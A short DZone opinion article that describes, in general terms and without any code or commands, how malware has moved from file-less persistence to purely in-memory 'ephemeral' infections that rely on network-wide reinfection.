An entirely new class of malware, that infects entire networks of systems, and counts on infection scale to support persistence rather than specific technical means.
Join the DZone community and get the full member experience.Join For Free
In the past, we've all used some variant of the cyber kill-chain to model how malware campaigns work. Sometimes we use the actual one, from Lockheed-Martin, other times we might use something similar, but they all include attackers gaining system persistence.
About a decade ago, file-less malware started to emerge. These are malware strains that don't use file-based storage. Instead, they gain persistence via storage in things like the registry (where you can store things like scripts or shellcode). While registry storage is the most popular, other avenues include dropping registry run keys that don't store code, but rather commands that download and execute remotely staged payloads for in-memory execution. Windows Management Instrumentation (WMI) is another file-less storage techniques. WMI maintains its own repository where attackers can stash code for later execution. Group Policy Objects and command scheduling are two other ways attackers can avoid using files for malware storage, and they work in a similar way to the techniques outlined above.
Attackers have recently begun to move more strongly toward complete in-memory execution, skipping local persistence. This isn't really new - Code Red, in 2001, executed completely in memory. Meterpreter, a popular Metasploit module, was originally released in 2006. This ideas have been around, and have been used, but they have always acquired some kind of persistence on the compromised system. That's starting to change, starting with Duqu 2.0 and Kaspersky, just a few years ago.
Malware authors realized something - they didn't need to acquire persistence if the system was still going to be vulnerable after it rebooted or memory was otherwise cleared. Persistence mechanisms are much more visible than in-memory techniques today, so avoiding the need to persist makes attacking code much harder to find. Using purely in-memory techniques was feasible and difficult to see. And we're seeing more and more of this today.
Detecting these kinds of attacks, especially if they're not active, is very difficult. Loading a small DLL into a common system program like Explorer or your local anti-virus is hard to see and gives attackers unlimited access to that system when they want it, if they want it. Most anti-viruses can detect certain system calls previously used when injecting code into running processes, but attackers are coming up with different ways to execute these kinds of attacks, and they're not detected today.
This gives us an entirely new class of malware, where it infects entire networks of systems, and counts on infection scale to support persistence rather than specific technical means.
Welcome to the brave new world of Ephemeral Malware.
Opinions expressed by DZone contributors are their own.